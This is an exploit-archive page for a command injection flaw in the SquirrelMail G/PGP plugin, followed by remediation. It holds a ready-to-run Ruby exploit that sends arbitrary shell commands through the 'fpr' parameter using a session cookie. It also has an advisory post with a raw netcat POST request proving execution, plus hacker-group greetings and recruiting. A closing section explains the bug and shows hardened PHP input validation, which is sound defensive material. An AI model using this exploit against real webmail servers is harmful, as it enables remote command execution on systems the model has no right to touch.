SquirrelMail G/PGP Plugin deletekey() Command Injection Exploit

Code:
===============================================================
SquirrelMail G/PGP Plugin deletekey() Command Injection Exploit
===============================================================

#!/usr/local/bin/ruby
# Sends a single POST to the G/PGP plugin's keyring_main.php with shell
# metacharacters in the "fpr" (fingerprint) parameter, which the plugin
# passes unescaped to a shell command.

require 'net/http'
require 'net/https'

puts "http://backdoored.net"
puts "SquirrelMail G/PG deletekey() command injection exploit"
puts "Coded by Backdoored member."
puts "--------------------------------------------------"

# All six arguments are required: hostname path port cookie command ssl-flag
if ARGV.length < 6
  puts "Usage: ./squ_xploit hostname path port cookie command 0"
  puts "if host using ssl use 1 instead of 0"
  exit
end

host    = ARGV[0].to_s
port    = ARGV[2].to_i
cookie  = ARGV[3].to_s          # SQMSESSID value of an authenticated session
command = ARGV[4].to_s

victim = Net::HTTP.new(host, port)

# The SSL flag is the sixth argument (ARGV[5]); the original script read
# ARGV[3], i.e. the cookie, which never equals 1.
if ARGV[5].to_i == 1
  puts "Entering SSL mode baby"
  victim.use_ssl = true
end

#path = '/sq/plugins/gpg/modules/keyring_main.php'
path = ARGV[1].to_s

# The "fpr" value is wrapped in pipes so the injected command runs as part of
# the gpg invocation built by keyring_main.php.
data = "id=C5B1611B8E71C***&fpr= | " + command + "| &pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1"

pizza = "key=pYWrEbVTY%2Bc%3D; SQMSESSID=" + cookie
headers = {
  'Cookie'       => pizza,
  'Referer'      => 'http://www.google.com',
  'Content-Type' => 'application/x-www-form-urlencoded'
}

# Net::HTTP#post returns only the response object on current Ruby
# (Ruby 1.8 also returned the body as a second value).
resp = victim.post(path, data, headers)

puts 'Message = ' + resp.message
puts 'Code = ' + resp.code
resp.each { |key, val| puts key + ' = ' + val }
#puts resp.body
SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln

Code:
================================================================
SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln
================================================================

SquirrelMail G/PGP Encryption Plug-in Remote Command Execution Vulnerability
Bugtraq ID: 24782
-----------------------------

There are various vulnerabilities in this software! One is in keyring_main.php!
$fpr is not escaped from shell commands!

testbox:/home/w00t# cat /tmp/w00t
cat: /tmp/w00t: No such file or directory
testbox:/home/w00t#

***@silverlaptop:~$ nc *** 80
POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1
Host: ***
User-Agent: w00t
Keep-Alive: 300
Connection: keep-alive
Cookie: Authentication Data for SquirrelMail
Content-Type: application/x-www-form-urlencoded
Content-Length: 140

id=C5B1611B8E71C***&fpr= | touch /tmp/w00t | &pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1
...

testbox:/home/w00t# cat /tmp/w00t
testbox:/home/w00t#

So we just executed 'touch /tmp/w00t'!

WabiSabiLabi tries to sell the exploit for 700 Euro! ;) lol @ WabiSabiLabi!

Greets: oli and all members of jmp-esp!
jmp-esp is looking for people who are interested in IT security! Currently we are looking for people who like to write articles for a German ezine or are interested in exchanging information, exploits...
IRC: jmp-esp.kicks-ass.net / 6667 or 6661 (ssl) #main
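Both write-ups above come down to the same defect: the fpr parameter from the POST body is concatenated into a shell command line, so the pipe characters in "| touch /tmp/w00t |" are interpreted by the shell. The following PHP is an added illustration of that bug class and its fix; it is not code from the G/PGP plugin or from either author, and the function names, the homedir path and the sample fingerprint are hypothetical. It contrasts the unescaped concatenation with a version that first whitelists the value as a hex fingerprint or key id and then passes it through escapeshellarg():

```php
<?php
// Added illustrative example, not the plugin's own code. Reconstructs the
// pattern described in the advisory: a request parameter ($fpr) dropped
// unescaped into a shell command. All names here are hypothetical.

// VULNERABLE pattern: $fpr comes straight from $_POST and is interpolated
// into the command string, so shell metacharacters in it become syntax.
function build_delete_command_vulnerable(string $fpr, string $homedir): string
{
    return "gpg --homedir $homedir --batch --yes --delete-key $fpr";
}

// Hardened step 1: a fingerprint or key id is hex only. Anything else is
// not a valid key reference and should never reach a shell.
function validate_fingerprint(string $fpr): ?string
{
    $fpr = strtoupper(str_replace(' ', '', trim($fpr)));
    // 40 hex digits = v4 fingerprint; 16 or 8 hex digits = long/short key id
    if (preg_match('/^(?:[0-9A-F]{40}|[0-9A-F]{16}|[0-9A-F]{8})$/', $fpr)) {
        return $fpr;
    }
    return null;
}

// Hardened step 2: even a validated value is quoted with escapeshellarg()
// as defence in depth, and a rejected value aborts before any command is built.
function build_delete_command_safe(string $fpr, string $homedir): ?string
{
    $clean = validate_fingerprint($fpr);
    if ($clean === null) {
        error_log('gpg plugin: rejected malformed fpr parameter');
        return null;
    }
    return 'gpg --homedir ' . escapeshellarg($homedir)
         . ' --batch --yes --delete-key ' . escapeshellarg($clean);
}

// Demonstration: the advisory's payload versus a constructed, well-formed
// 40-hex-digit fingerprint (sample value, not a real key).
$payload = ' | touch /tmp/w00t | ';
$sample  = 'C5B1611B8E71C00000000000000000000000AAAA';
$homedir = '/var/www/.gnupg';

echo "vulnerable: " . build_delete_command_vulnerable($payload, $homedir) . "\n";

$rejected = build_delete_command_safe($payload, $homedir);
echo "hardened (payload): " . ($rejected === null ? 'rejected' : $rejected) . "\n";
echo "hardened (sample):  " . build_delete_command_safe($sample, $homedir) . "\n";
```

The whitelist does the real work: once the value can only be hex, there is nothing left for a shell to interpret, and escapeshellarg() only guards against a future regression in the pattern. On PHP 7.4 and later the shell can be avoided altogether by handing proc_open() an argv array instead of a command string, which removes the concatenation problem at its root.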